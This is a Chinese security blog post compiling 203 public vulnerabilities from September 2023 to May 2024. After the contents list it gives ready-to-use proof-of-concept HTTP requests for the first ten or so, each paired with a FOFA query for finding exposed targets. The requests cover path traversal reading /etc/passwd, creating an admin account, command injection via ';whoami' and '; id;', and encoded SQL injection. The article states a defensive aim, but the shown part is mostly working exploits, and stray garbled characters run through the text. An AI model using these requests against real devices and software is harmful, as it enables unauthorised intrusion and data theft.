互联网公开漏洞整理202309-202406! h, x1 Y `1 w6 I- x
道一安全 2024-06-05 07:41 北京
) \7 B' S) P! f/ m9 |. k以下文章来源于网络安全新视界 ,作者网络安全新视界8 ~% P+ \- _. ]. {6 \- k
5 c, b7 k3 h. p发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。0 O9 e3 ~$ g; i% ^, j/ { ]
- F* W: @* u/ t1 M7 S1 k漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
& X/ S- X p I" J- N: O1 n" l
8 S* C. b* Y; `& x4 G9 S5 n安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
* I( @$ i9 _& O# u. ?* Y. n# @
( _2 R" ~) u& O! T5 t文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。( J( E+ M7 o$ Q7 Q; _
# G8 v3 z, I: W! ^
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
: O" w) h1 m' I7 c5 M ]6 B+ I1 G# ?, Y! j" V! A& }& ~$ z( V
7 b' y! d0 E& T" u5 [声明
: z7 n# y8 j+ V( B2 _8 T0 Z6 @5 M( L. F5 K, |: P: R4 ?
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。0 w# [% e. i/ `6 ?6 c! j
' T6 F2 c, H7 n有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。: X# Y3 K% o( A: @1 t) R6 Y3 k
* b& Q/ J1 F d1 z- i0 H& W
2 a6 p/ p: T& Z' p
# x4 z3 T7 Y# b% H5 r
目录/ V4 h0 p" ? @- n
, q9 \. C, K D( y% G# f/ n01! B9 ^( j! T/ x
0 c# H/ |& U2 z1. StarRocks MPP数据库未授权访问8 |9 H6 J+ Q) z9 _ _
2. Casdoor系统static任意文件读取+ c0 B5 |. p; \( q1 }' ]/ f, ^
3. EasyCVR智能边缘网关 userlist 信息泄漏
. {) _; t# Q9 x2 N4. EasyCVR视频管理平台存在任意用户添加
3 a- u! U$ q! \$ N3 @5. NUUO NVR 视频存储管理设备远程命令执行& Q& u2 ^" E, T
6. 深信服 NGAF 任意文件读取
, }% R1 R6 @4 v( G7. 鸿运主动安全监控云平台任意文件下载
* r' m$ |* r2 b5 N" _7 c8. 斐讯 Phicomm 路由器RCE
' Y; }- j1 G% O7 q2 l; J0 _- Y9. 稻壳CMS keyword 未授权SQL注入
) ^) B3 L6 |+ E- L9 H0 k+ \, D10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
3 g' i2 t! d, e; I: C" L11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
4 B1 @2 |) U' k- I" J12. Jorani < 1.0.2 远程命令执行
4 z& [, K7 M1 @' }; ]13. 红帆iOffice ioFileDown任意文件读取
/ S8 K2 k7 K, P, t5 u14. 华夏ERP(jshERP)敏感信息泄露% G+ j) b4 X$ k9 G
15. 华夏ERP getAllList信息泄露+ ?% q: Z5 _; j2 o4 B
16. 红帆HFOffice医微云SQL注入: f+ A4 G) J" o8 i
17. 大华 DSS itcBulletin SQL 注入
# z1 ]' M# J8 O6 `9 u$ v: C% v18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
}; K% @; W' U. ]6 Q% B" F3 H19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
: f9 o2 E+ s& K2 s1 D/ l d h) n0 ~20. 大华ICC智能物联综合管理平台任意文件读取
# d$ p7 N$ \- K6 w9 w21. 大华ICC智能物联综合管理平台random远程代码执行0 H, C' z7 d5 W8 T* P& ^
22. 大华ICC智能物联综合管理平台 log4j远程代码执行7 t3 `; i4 c6 r
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
k0 } s( q0 X- Q: h24. 用友NC 6.5 accept.jsp任意文件上传
9 S% r# }7 [: D25. 用友NC registerServlet JNDI 远程代码执行: Y/ m& J4 z9 n: Z5 c3 y- c% z5 w* M
26. 用友NC linkVoucher SQL注入
+ k! Q! [: Y: M q( R* r7 s3 e27. 用友 NC showcontent SQL注入1 }- v0 { ]& |8 `1 F
28. 用友NC grouptemplet 任意文件上传
2 r+ q1 C2 H. k) ^29. 用友NC down/bill SQL注入* d4 h7 e$ u! s6 ]3 c* c# J0 C1 v5 m
30. 用友NC importPml SQL注入- J1 M# W/ q3 c* B% u& a
31. 用友NC runStateServlet SQL注入
) N6 ]" J, {8 c: w; H32. 用友NC complainbilldetail SQL注入
, V5 p; T6 j; o33. 用友NC downTax/download SQL注入: P- i1 ~3 D# ]) x1 U1 H
34. 用友NC warningDetailInfo接口SQL注入
* [2 R/ T, f. e' H( V9 M" a/ [35. 用友NC-Cloud importhttpscer任意文件上传/ I N: M; D1 R2 i& T6 P7 j% ^
36. 用友NC-Cloud soapFormat XXE' X( }6 A2 ?( W8 Z7 D7 c
37. 用友NC-Cloud IUpdateService XXE8 ~$ z5 ~1 U4 y8 R; m: M5 p5 [3 R
38. 用友U8 Cloud smartweb2.RPC.d XXE; {. T M7 u8 f# ~! _
39. 用友U8 Cloud RegisterServlet SQL注入
) ^' _3 a- M) a% `: z1 b* D/ w40. 用友U8-Cloud XChangeServlet XXE
' K* A/ d; m. l* S4 N3 S/ C41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
: m K- ?0 s$ a; F' v) }& T42. 用友GRP-U8 SmartUpload01 文件上传
% k# Z6 A" q" n; e" e7 M6 j43. 用友GRP-U8 userInfoWeb SQL注入致RCE
% `% `# W% B: q F! v8 e. d44. 用友GRP-U8 bx_dj_check.jsp SQL注入, A7 i/ I# z. j* V' J
45. 用友GRP-U8 ufgovbank XXE! P) ~3 s; o5 `) G8 s
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
! U) K/ A5 J: [) j# |' q47. 用友GRP A++Cloud 政府财务云 任意文件读取0 { O) f* \# L! A6 L
48. 用友U8 CRM swfupload 任意文件上传; w% @" F' F. X; c3 e9 l
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
% O% F9 G' ?" T/ Q) |' m, Z! j50. QDocs Smart School 6.4.1 filterRecords SQL注入* d+ U' J6 U4 u$ f2 I
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
* f9 l' {3 q) W1 U5 d& y0 f$ i52. 泛微E-Office json_common.php sql注入
6 ^, b% l% ^& m) {53. 迪普 DPTech VPN Service 任意文件上传7 @, H8 M$ }. F" K, A
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
4 a& r6 H( B3 i" X b) w( `" c55. 畅捷通T+ getdecallusers信息泄露6 K& a! v* [* y
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
- c9 Q% n! N$ N" n( ?( I6 W- @57. 畅捷通T+ keyEdit.aspx SQL注入
. B+ p8 z8 j+ i4 F58. 畅捷通T+ KeyInfoList.aspx sql注入2 P% `5 V# N! f% |2 q
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行: ~/ |# i8 p$ ?+ S0 N
60. 百卓Smart管理平台 importexport.php SQL注入+ S0 v6 |# c3 f; F1 H
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
3 G0 T) e2 U8 g* W3 P8 B62. IP-guard WebServer 远程命令执行
4 w, c- ?% [# J Y; j: @9 A& k63. IP-guard WebServer任意文件读取( E2 E9 F& ]% I7 I& j
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
/ v0 [4 Z8 P5 V! s/ {# p8 I65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
1 x- s4 m& p9 L66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入1 k4 Q! N S- Y& f2 p. H& ?
67. 万户ezOFFICE wpsservlet任意文件上传
1 X3 }8 [6 s, Q! Y$ J6 J1 f% U68. 万户ezOFFICE wf_printnum.jsp SQL注入* b/ ?) G; `. u
69. 万户 ezOFFICE contract_gd.jsp SQL注入% a( A4 Y' d! Y; ]# M/ t
70. 万户ezEIP success 命令执行. H; s+ M% k8 [: s
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
6 H; u6 ~0 j* n1 x$ L, z6 J72. 致远OA getAjaxDataServlet XXE' j. y1 ]( _& l# a$ v2 n
73. GeoServer wms远程代码执行
# J9 |/ D r( ?! S$ R9 f' _3 J5 ?' }74. 致远M3-server 6_1sp1 反序列化RCE
5 Y9 G! N8 o5 _8 n0 W75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
4 ]3 c! r& r( E' o) V3 b7 H76. 新开普掌上校园服务管理平台service.action远程命令执行
8 F4 {5 I' w, x4 m% L7 f77. F22服装管理软件系统UploadHandler.ashx任意文件上传9 f- p, z3 s% P5 ~% g: K3 d
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传2 s! c: J X! Q& O4 |8 y. K7 G) S+ ]
79. BYTEVALUE 百为流控路由器远程命令执行
9 Q! m- w' D4 |80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传$ R# {' V6 K1 F) m; X* `
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露- p% k6 `2 D6 l( g
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行9 u: k3 Q2 S& D$ S9 g3 ^ ?" |3 G
83. JeecgBoot testConnection 远程命令执行) l' m- c# u7 a" s$ T; F) Y
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
* X9 V$ y+ X) ?85. SysAid On-premise< 23.3.36远程代码执行
6 \" Y3 ]9 r' ^9 ?! Z: \86. 日本tosei自助洗衣机RCE
. i; s4 P+ u3 Q. o- p87. 安恒明御安全网关aaa_local_web_preview文件上传2 v' M* u- T2 V
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
5 e' h3 W7 N% ?" l$ J/ L. v' ?8 S7 A/ G89. 致远互联FE协作办公平台editflow_manager存在sql注入
& O" t# N; h/ d \90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
5 N" ~- h1 S2 I; \. _91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取8 C y3 L/ ~/ @' K0 L" v) M5 E# h
92. 海康威视运行管理中心session命令执行$ s7 m6 S8 q3 G# B# u" a0 `% m
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传6 A [. k( \( P/ u, z; Q( D9 }
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传, S7 i* C" B( s3 S- i; `+ b2 f& H
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
" s/ g c, c3 ~8 N& Z; _( @! d96. Apache OFBiz 18.12.11 groovy 远程代码执行
( H+ _0 e. F. Z9 q5 }' ~1 [97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行9 h5 l' O) ~+ _
98. SpiderFlow爬虫平台远程命令执行& o. f" x7 p0 M/ s8 ^
99. Ncast盈可视高清智能录播系统busiFacade RCE
0 S8 r0 g ~" y, ?) |100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
. J4 F# B! e0 I* h% S101. ivanti policy secure-22.6命令注入2 v" K' R2 T6 \( p
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
5 S7 [3 C6 [$ ~" J8 Z' c! J103. Ivanti Pulse Connect Secure VPN XXE; b$ w z; d4 V
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
1 J9 Q0 g6 `, _' D' q105. SpringBlade v3.2.0 export-user SQL 注入
9 a6 m# D- k0 X7 K9 A I106. SpringBlade dict-biz/list SQL 注入
T/ j6 A0 r* k {, N- b0 C107. SpringBlade tenant/list SQL 注入) E) L* [+ B3 I8 S
108. D-Tale 3.9.0 SSRF. m- L: R9 O; z) U
109. Jenkins CLI 任意文件读取
# x$ d" o+ `5 s" q: B110. Goanywhere MFT 未授权创建管理员
( |& w8 i3 U* c% X; s9 m+ B111. WordPress Plugin HTML5 Video Player SQL注入* m7 Q- ~8 r4 R. ?7 t8 w
112. WordPress Plugin NotificationX SQL 注入
& Y: C; Q6 c1 L$ O' `- k) b% u113. WordPress Automatic 插件任意文件下载和SSRF8 n% \$ j4 I. ?4 g+ _* B
114. WordPress MasterStudy LMS插件 SQL注入0 F+ }$ @$ w& G7 z
115. WordPress Bricks Builder <= 1.9.6 RCE9 u: g. ?) a8 ^
116. wordpress js-support-ticket文件上传% C h: Y4 j- d9 v
117. WordPress LayerSlider插件SQL注入# \. H( n! [" _5 F4 Z4 z+ F
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
5 |4 q% W, R% q: ?1 i( D119. 北京百绰智能S20后台sysmanageajax.php sql注入
: ?$ j' u. s" G& Y120. 北京百绰智能S40管理平台导入web.php任意文件上传+ w% V& X7 a- T& X2 l
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
! j) L. `$ o& T+ R122. 北京百绰智能s200管理平台/importexport.php sql注入
6 |+ m$ F" W2 T9 B123. Atlassian Confluence 模板注入代码执行
0 O2 o: s, ^' F124. 湖南建研工程质量检测系统任意文件上传
1 T. h: \& Y: F! ~' O125. ConnectWise ScreenConnect身份验证绕过# v+ G! |- i% Y
126. Aiohttp 路径遍历+ P/ [2 j8 @! S* W
127. 广联达Linkworks DataExchange.ashx XXE
$ h' ^9 a+ c" w128. Adobe ColdFusion 反序列化
4 z& i2 C, y8 M6 R4 a+ _129. Adobe ColdFusion 任意文件读取
* o6 h! j( f8 f O130. Laykefu客服系统任意文件上传1 e/ C1 ]- [! }4 \$ X5 E7 W
131. Mini-Tmall <=20231017 SQL注入
% `% z6 q" \# d4 y$ T# j0 g3 ~132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过1 x9 F& Q- n. V, O" W0 N' G2 d1 u
133. H5 云商城 file.php 文件上传
5 I1 Z: a4 J$ m n N134. 网康NS-ASG应用安全网关index.php sql注入6 E1 v+ m4 \* A: n/ I& h
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
2 b( T( S; O4 C$ @9 a- [136. NextChat cors SSRF7 A' e- H8 S9 b+ [ e( H: [
137. 福建科立迅通信指挥调度平台down_file.php sql注入
4 d3 J* p9 V6 O$ L/ a% f; g- O138. 福建科立讯通信指挥调度平台pwd_update.php sql注入+ ~/ U1 A( P+ S/ w7 Y
139. 福建科立讯通信指挥调度平台editemedia.php sql注入 H. r( }( `9 d( ^
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
6 L9 g5 }" n8 w* ?! f3 e141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入4 s5 i `0 l. W" O7 a
142. CMSV6车辆监控平台系统中存在弱密码' Y1 ^. a! V- l0 V
143. Netis WF2780 v2.1.40144 远程命令执行
& X/ E5 F7 c1 x4 b144. D-Link nas_sharing.cgi 命令注入
$ d) @7 V9 }0 G8 q145. Palo Alto Networks PAN-OS GlobalProtect 命令注入5 m8 M w: a1 Q( c1 ^0 ]+ _
146. MajorDoMo thumb.php 未授权远程代码执行6 O" Q9 l. G. |2 a
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
; C) Q* Z+ i2 F1 S" X& f/ C148. CrushFTP 认证绕过模板注入2 i; ?0 [0 {9 b; ~8 g. R
149. AJ-Report开源数据大屏存在远程命令执行, y9 l0 t, ~+ f7 k( m; \/ G
150. AJ-Report 1.4.0 认证绕过与远程代码执行0 \5 m' E! U( ?( g! N# L
151. AJ-Report 1.4.1 pageList sql注入
1 p9 @6 Z: c% k4 z, w152. Progress Kemp LoadMaster 远程命令执行
# i3 c9 y5 O7 X; ]) n6 D q/ g153. gradio任意文件读取
% E9 C. c9 i7 M7 }154. 天维尔消防救援作战调度平台 SQL注入
/ T0 x: a M# p9 d8 m2 Y155. 六零导航页 file.php 任意文件上传
+ a( ~9 S2 [5 s3 S* d156. TBK DVR-4104/DVR-4216 操作系统命令注入, a6 T6 j2 S* ?6 W+ R
157. 美特CRM upload.jsp 任意文件上传
+ m, T2 _- _9 w/ C158. Mura-CMS-processAsyncObject存在SQL注入" f, k5 h+ z# n7 |' T! I
159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
5 J6 H/ C8 x$ k. `& I$ Y160. Sonatype Nexus Repository 3目录遍历与文件读取! p& s! Z$ S) K" g5 O& [: G9 }
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传' w# @. r9 ^. @& Q/ Z7 p& J. C
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
4 q5 }& W, P+ ?4 {163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
% x* l+ o0 x i1 l2 J1 c164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
% Q; S$ J4 u1 i: }- M, o. `3 u8 {# k165. OrangeHRM 3.3.3 SQL 注入
4 E* O q$ L1 r% Y3 k166. 中成科信票务管理平台SeatMapHandler SQL注入
2 ]2 d1 o. P! P! T; H7 I167. 精益价值管理系统 DownLoad.aspx任意文件读取
; F* C9 A' ~) V9 I4 |- V& c; @168. 宏景EHR OutputCode 任意文件读取7 |1 A1 ?6 P3 |" o) |7 R* S
169. 宏景EHR downlawbase SQL注入
- [: Z; D! Y+ n: z170. 宏景EHR DisplayExcelCustomReport 任意文件读取
; S6 u c4 t9 I9 F1 b8 T, {171. 通天星CMSV6车载定位监控平台 SQL注入/ G8 [! i) H8 s. O1 c. x2 T: ?
172. DT-高清车牌识别摄像机任意文件读取
& i8 {5 X1 G) ` V, X" J173. Check Point 安全网关任意文件读取
$ Q$ K0 z! h' H- e" T+ Q% o174. 金和OA C6 FileDownLoad.aspx 任意文件读取
~; D$ u% p" ]& {! E: j# v175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
B/ x' }( z1 K+ d9 g" B/ Q176. 电信网关配置管理系统 rewrite.php 文件上传
+ M. o# ^( e' P177. H3C路由器敏感信息泄露
$ K$ M3 G8 t, ^0 j- s) f! k# G% v178. H3C校园网自助服务系统-flexfileupload-任意文件上传 N( w; X. X) x. Q+ ^* b) L
179. 建文工程管理系统存在任意文件读取6 x+ R, J* n9 w
180. 帮管客 CRM jiliyu SQL注入5 L, X# {6 n N; J" D% W5 V1 ]
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入% \/ f# l& W/ ]1 T2 B H
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
9 t9 X2 v) H( j- f183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
2 C- H, e, h2 \$ A184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
9 r! F) T! p( B185. 瑞友天翼应用虚拟化系统SQL注入
& E' D+ U3 \; [: C. W( P, c; I186. F-logic DataCube3 SQL注入
/ b6 s9 T8 l W9 i& Z, ]2 n& \* e! X187. Mura CMS processAsyncObject SQL注入
& s( v: C: X$ ?/ \ L$ Z% O188. 叁体-佳会视频会议 attachment 任意文件读取$ Y2 G" b$ [7 g; f m. W5 ?* w
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
: v5 w9 N T' v& K190. 短视频矩阵营销系统 poihuoqu 任意文件读取 b/ u. p R1 _" E$ E& Y6 P8 ?' f
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入, |2 U) O; L$ j# E
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
' u" q4 M2 f0 L5 {2 y" Q) m193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
+ }+ R9 }# F% F2 X; y. s/ i194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
( F& T( @4 T* g$ p# Y. ]; s195. 飞鱼星上网行为管理系统 send_order.cgi命令执行: Q, @) [0 {9 w. U2 P! N: y
196. 河南省风速科技统一认证平台密码重置4 n# O5 i8 Y6 a# I
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入1 g- y: {1 `) K2 b
198. 阿里云盘 WebDAV 命令注入+ W. Q: b- ]) i
199. cockpit系统assetsmanager_upload接口 文件上传
! u0 y1 i6 D" x( N' o' a200. SeaCMS海洋影视管理系统dmku SQL注入
- z& i7 \2 q1 X) W+ t" f2 f, X201. 方正全媒体新闻采编系统 binary SQL注入+ k l: p: l9 p
202. 微擎系统 AccountEdit任意文件上传
" o) k' [- i$ `) b1 P4 N203. 红海云EHR PtFjk 文件上传+ ?3 c, Q& S9 |9 S! H$ k
$ D+ x0 I, d% O2 G: }' ^
POC列表
' r+ W. g; }5 m1 O o/ E5 H
5 }2 j+ W4 G) i8 Q r+ G' D. A" n4 a02
9 e0 {% x' g# l% D" p% U0 L8 U; ]# J0 p3 y7 V3 m; `, K
1. StarRocks MPP数据库未授权访问
0 Z f5 ^- R$ ]+ {1 g A' YFOFA :title="StarRocks": Z i' t/ Y3 w- h3 |: F
GET /mem_tracker HTTP/1.1
5 x4 D/ X6 S8 BHost: URL
! V) i' \# a2 K* B) P# I9 }! q2 l2 E2 G, P
7 \9 @% W3 G. [, C! B4 [! l
2. Casdoor系统static任意文件读取+ l/ j- Y P& C F4 H
FOFA :title="Casdoor"
& A- T( T9 K2 @GET /static/../../../../../../../../../../../etc/passwd HTTP/1.15 q+ C9 A3 R# |0 ? l; o8 C g
Host: xx.xx.xx.xx:9999
/ ]( h% M ^. Z3 p1 qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 Q5 _' w( U# [( ~. @9 AConnection: close* [: x, d, Y, V& j6 q
Accept: */*
4 a, B- L. H$ ~! OAccept-Language: en4 [4 q1 p& Y( p, U4 [
Accept-Encoding: gzip5 e" X3 v" W+ w+ s" _+ H" ]
$ ?* C6 g6 q# g, J \
* F3 T3 N: `( ^! a2 ^+ b
3. EasyCVR智能边缘网关 userlist 信息泄漏 O& b4 p% p, F. F# Q
FOFA :title="EasyCVR"
: M1 p$ G' e" {/ n aGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
( `- h) h$ I L8 _4 \Host: xx.xx.xx.xx
% X( g W7 e+ S0 u& g9 y% j( o) I4 H# J! c) j9 _6 D
. g2 t, p! ~+ A4. EasyCVR视频管理平台存在任意用户添加3 E6 S, q t' }+ l' G1 l/ M/ `/ Q' c6 W
FOFA :title="EasyCVR"
. u2 ~, }. z6 g3 T( P
D. b; Z& M9 h/ _ G1 C6 Q- fpassword更改为自己的密码md5
/ \8 P+ h% T8 sPOST /api/v1/adduser HTTP/1.1
7 [! h8 v, C& f) Q6 E; x" N, xHost: your-ip
g% c4 F- i: s$ b( BContent-Type: application/x-www-form-urlencoded; charset=UTF-8
; x. n. J- ]9 a1 m4 y3 k1 u7 I3 a* y3 A$ ]6 W: Y! h5 d3 Y: q
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=13 i5 v9 z$ o+ k* t
5 A- h5 r- T; ?( h5 I4 |) c; c: S6 v
5. NUUO NVR 视频存储管理设备远程命令执行. k A7 m" W# {" g5 ?1 ^& }
FOFA:title="Network Video Recorder Login"
0 C1 B) ?7 s% o/ m+ @- h; ]GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
% d* [: A$ o9 o% ~9 o1 gHost: xx.xx.xx.xx8 \) c3 ^& u; s# i+ A
$ M. Y2 N y z0 i3 f! i8 h" g5 ~/ U# T3 f$ F% I7 M: _6 C0 T& ^
6. 深信服 NGAF 任意文件读取
6 g' [# g \: CFOFA:title="SANGFOR | NGAF"+ i1 D# B8 b% J2 g
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
. ?/ i: h# N% {! WHost:
; Z& J& b- w! i; K! i5 E- J7 m5 N8 X8 w7 y3 Y( Y- ^
1 |: z# {* W! l2 Y7. 鸿运主动安全监控云平台任意文件下载1 O0 x9 W% `2 D. q0 f0 k
FOFA:body="./open/webApi.html"
) W; G/ }" t4 S, O, t# A/ C( mGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.14 U2 Q2 I' a& h
Host:6 h% G' C; I. B; y5 X
" ~: n; g7 ~% Z& a+ ]+ Q6 T; _: f# X0 {# D1 t8 n5 y
8. 斐讯 Phicomm 路由器RCE: {5 k7 D l$ R0 [
FOFA:icon_hash="-1344736688"3 J' s6 o2 `5 e, C
默认账号admin登录后台后,执行操作
* }7 H6 o- i8 U2 ], [POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1" g1 {0 O$ p8 S- g% W
Host: x.x.x.x
* |* w- N, `9 t1 K$ v/ FCookie: sysauth=第一步登录获取的cookie
' O4 L# X- d/ T: sContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
" ?2 k O9 K9 S9 _User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.360 y( `" ^4 F1 ~6 A- M
$ N0 c/ i; U* p
------WebKitFormBoundaryxbgjoytz' C3 K5 X* H$ g8 x0 X0 ^& T
Content-Disposition: form-data; name="wifiRebootEnablestatus"
- E: H& b$ U* k
# r6 u. |+ ^, m! \%s
' N( m1 K* G# w- v------WebKitFormBoundaryxbgjoytz
9 O# N% {4 @% \( f' LContent-Disposition: form-data; name="wifiRebootrange"
: m0 z" ^7 c0 O$ ^: Z7 m& H9 @/ N8 F% b L' ]8 v
12:00; id;; k: U1 s4 H# j# O/ ^+ H
------WebKitFormBoundaryxbgjoytz
$ R$ ]1 \7 t+ cContent-Disposition: form-data; name="wifiRebootendrange"8 Q& w* v. ? }# l0 b
6 v0 A3 Q- f# n( ]. h% F; h: V
%s:( J9 ]% `! g. \# s' }6 b
------WebKitFormBoundaryxbgjoytz& [6 M! n2 T, X2 L& ?' H
Content-Disposition: form-data; name="cururl2"+ U/ _; @: Z/ |
% {0 Y9 u5 P/ M. P) p: {$ a6 ~) U
# X- h8 j( g; e) W7 _! v/ U------WebKitFormBoundaryxbgjoytz--
6 K8 a4 `. z3 Y! z4 G# c) [( m6 ~7 A+ m" D+ m% {; k/ U& R
$ S ?2 l8 D6 q' J! A
9. 稻壳CMS keyword 未授权SQL注入* }. `" k" l- c" ]2 U# K' y7 J! d
FOFA:app="Doccms"
$ Y( A6 } G; uGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
9 f3 `. U/ O5 k; G. L+ A/ JHost: x.x.x.x4 T# P* A/ a8 t) `1 ~6 Y
; ]( O' r) O3 u$ O6 R& T5 d0 ~1 B$ X
payload为下列语句的二次Url编码
$ d7 }) }6 @$ \* u: J8 @# G" {3 M
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
. I, i- H5 H: s& T( f# l1 a9 R6 I: M5 R" ^% R1 C! a
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传( C6 m K! p; o8 T, B6 s7 ?
FOFA:icon_hash="953405444", N0 a/ ]. r% S; s- Z$ t. [2 ^
* e4 d3 s" d( X1 k; Y文件上传后响应中包含上传文件的路径
7 N; s8 v, \1 ]6 Y( M% ^1 W0 ^; F# PPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
; _5 s6 B$ B% o# [/ c$ M0 I; gHost: x.x.x.x:xx
& V( Y8 D. F7 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36/ m- ~4 X3 i6 _( p$ `+ U
Content-Length: 197
2 ^5 J2 m" l% @2 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
- N; O: C( b, u3 D' H( M6 Q& QAccept-Encoding: gzip, deflate
( Q) [/ B+ v }1 l' P# E( uAccept-Language: zh-CN,zh;q=0.9
& Y9 G' w$ \, A, n# d" _# J% xConnection: close
$ h/ b$ f: p" @/ ~+ N, r( e0 Z" xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
1 K. G! C0 v2 y0 [0 t/ _% Z9 P9 i. {* N9 e( g, b& h1 n' r9 @
------WebKitFormBoundaryxdgaqmqu
- P* t& y1 J( ?) g' {* xContent-Disposition: form-data; name="file"filename="icfitnya.txt"; _3 ^+ D1 o% H1 `! M, j0 w$ _
Content-Type: text/html" Y6 o8 ? |) r8 E5 L: t# x& p
/ @4 r2 R. K% C/ ~% F
jmnqjfdsupxgfidopeixbgsxbf
& L9 x2 `& y6 b9 F+ u0 T# a) z------WebKitFormBoundaryxdgaqmqu--. l* w9 R( n; g" C5 X6 C$ ]
# Z7 H! B0 E, Q8 |3 E7 T9 K
) y: R7 b, K; z# A2 w& t- i7 a. Z
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入$ _, ^- E+ X$ P
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"( a: f1 l+ H! w
